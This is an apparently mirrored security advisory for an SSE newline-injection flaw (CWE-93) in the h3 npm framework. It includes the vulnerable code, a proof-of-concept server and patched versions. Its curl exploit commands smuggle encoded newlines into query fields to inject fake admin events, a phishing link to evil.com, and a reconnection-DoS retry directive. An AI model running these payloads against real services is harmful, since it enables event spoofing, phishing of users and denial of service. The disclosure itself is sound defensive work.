h3 has a Server-Sent Events Injection via Unsanitized Newlines in Event Stream Fields

描述

Summary

createEventStream in h3 is vulnerable to Server-Sent Events (SSE) injection due to missing newline sanitization in formatEventStreamMessage() and formatEventStreamComment(). An attacker who controls any part of an SSE message field (id, event, data, or comment) can inject arbitrary SSE events to connected clients.

Details

The vulnerability exists in src/utils/internal/event-stream.ts, lines 170-187:

export function formatEventStreamComment(comment: string): string {
  return `: ${comment}\n\n`;
}

export function formatEventStreamMessage(message: EventStreamMessage): string {
  let result = "";
  if (message.id) {
    result += `id: ${message.id}\n`;
  }
  if (message.event) {
    result += `event: ${message.event}\n`;
  }
  if (typeof message.retry === "number" && Number.isInteger(message.retry)) {
    result += `retry: ${message.retry}\n`;
  }
  result += `data: ${message.data}\n\n`;
  return result;
}

The SSE protocol (defined in the WHATWG HTML spec) uses newline characters (\n) as field delimiters and double newlines (\n\n) as event separators.

None of the fields (id, event, data, comment) are sanitized for newline characters before being interpolated into the SSE wire format. If any field value contains \n, the SSE framing is broken, allowing an attacker to:

  1. Inject arbitrary SSE fields — break out of one field and add event:, data:, id:, or retry: directives
  2. Inject entirely new SSE events — using \n\n to terminate the current event and start a new one
  3. Manipulate reconnection behavior — inject retry: 1 to force aggressive reconnection (DoS)
  4. Override Last-Event-ID — inject id: to manipulate which events are replayed on reconnection

Injection via the event field

Intended wire format:        Actual wire format (with \n injection):

event: message               event: message
data: attacker: hey          event: admin              ← INJECTED
                             data: ALL_USERS_HACKED    ← INJECTED
                             data: attacker: hey

The browser's EventSource API parses these as two separate events: one message event and one admin event.

Injection via the data field

Intended:                    Actual (with \n\n injection):

event: message               event: message
data: bob: hi                data: bob: hi
                                                        ← event boundary
                             event: system              ← INJECTED event
                             data: Reset: evil.com      ← INJECTED data

Before exploit:
<img width="700" height="61" alt="image" src="https://github.com/user-attachments/assets/d9d28296-0d42-40d7-b79c-d337406cbfc9" />

<img width="713" height="228" alt="image" src="https://github.com/user-attachments/assets/5a52debc-2775-4367-b427-df4100fe2b8e" />

PoC

Vulnerable server (sse-server.ts)

A realistic chat/notification server that broadcasts user input via SSE:

import { H3, createEventStream, getQuery } from &quot;h3&quot;;
import { serve } from &quot;h3/node&quot;;

const app = new H3();
const clients: any[] = [];

app.get(&quot;/events&quot;, (event) =&gt; {
  const stream = createEventStream(event);
  clients.push(stream);
  stream.onClosed(() =&gt; {
    clients.splice(clients.indexOf(stream), 1);
    stream.close();
  });
  return stream.send();
});

app.get(&quot;/send&quot;, async (event) =&gt; {
  const query = getQuery(event);
  const user = query.user as string;
  const msg = query.msg as string;
  const type = (query.type as string) || &quot;message&quot;;

  for (const client of clients) {
    await client.push({ event: type, data: `${user}: ${msg}` });
  }

  return { status: &quot;sent&quot; };
});

serve({ fetch: app.fetch });

Exploit

# 1. Inject fake &quot;admin&quot; event via event field
curl -s &quot;http://localhost:3000/send?user=attacker&amp;msg=hey&amp;type=message%0aevent:%20admin%0adata:%20SYSTEM:%20Server%20shutting%20down&quot;

# 2. Inject separate phishing event via data field
curl -s &quot;http://localhost:3000/send?user=bob&amp;msg=hi%0a%0aevent:%20system%0adata:%20Password%20reset:%20http://evil.com/steal&amp;type=message&quot;

# 3. Inject retry directive for reconnection DoS
curl -s &quot;http://localhost:3000/send?user=x&amp;msg=test%0aretry:%201&amp;type=message&quot;

Raw wire format proving injection

event: message
event: admin
data: ALL_USERS_COMPROMISED
data: attacker: legit

The browser's EventSource fires this as an admin event with data ALL_USERS_COMPROMISED — entirely controlled by the attacker.

Proof:

<img width="856" height="275" alt="image" src="https://github.com/user-attachments/assets/111d3fde-e461-4e44-8112-9f19fff41fec" />

<img width="950" height="156" alt="image" src="https://github.com/user-attachments/assets/ff750f9c-e5d9-4aa4-b48a-20b49747d2ab" />

Impact

An attacker who can influence any field of an SSE message (common in chat applications, notification systems, live dashboards, AI streaming responses, and collaborative tools) can inject arbitrary SSE events that all connected clients will process as legitimate.

Attack scenarios:

  • Cross-user content injection — inject fake messages in chat applications
  • Phishing — inject fake system notifications with malicious links
  • Event spoofing — trigger client-side handlers for privileged event types (e.g., admin, system)
  • Reconnection DoS — inject retry: 1 to force all clients to reconnect every 1ms
  • Last-Event-ID manipulation — override the event ID to cause event replay or skipping on reconnection

This is a framework-level vulnerability, not a developer misconfiguration — the framework's API accepts arbitrary strings but does not enforce the SSE protocol's invariant that field values must not contain newlines.

基本信息

类型
reviewed
严重度
high
GitHub 上的公告
打开公告 ↗
仓库公告
打开仓库公告 ↗
源代码
浏览源码 ↗
公开(公告)
2026-03-18 16:17:43 UTC
更新时间
2026-03-20 21:27:42 UTC
GitHub 审核
2026-03-18 16:17:43 UTC
NVD 公开
2026-03-20

EPSS Score

Score Percentile
0.02% 5.09%

CVSS Scores

Base score Version Severity Vector
7.5 3.1
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N 点击展开
攻击向量 (AV:N)
经互联网或企业内可路由网段即可从远端触达,攻击者不必出现在设备旁。
攻击复杂度 (AC:H)
即便网络可达,也常要卡窗口、凑负载或特定版本组合才打得响。
权限要求 (PR:N)
不必事先登录或提权,匿名会话也可能成为跳板。
用户交互 (UI:N)
无需受害者点击链接、放行宏或安装软件,攻击链可自动走完。
作用域 (S:C)
可从脆弱组件横向波及其他组件或更高权限域,爆炸半径更大。
机密性影响 (C:L)
可能外泄部分字段或样本数据,但难以形成“整库拖走”的局面。
完整性影响 (I:H)
可篡改审计日志、植入后门或大面积伪造业务数据,动摇信任根基。
可用性影响 (A:N)
不至于造成业务意义上的长时间停摆或灾难性性能崩塌。

Identifiers

CWEs

CWE id Name
CWE-93 Improper Neutralization of CRLF Sequences ('CRLF Injection')

Credits

  • 0xkakash1 (reporter)

Affected packages (2)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
npm h3 >= 2.0.0, <= 2.0.1-rc.14 2.0.1-rc.15
npm h3 < 1.15.6 1.15.6

References

cvelogic Threat Intelligence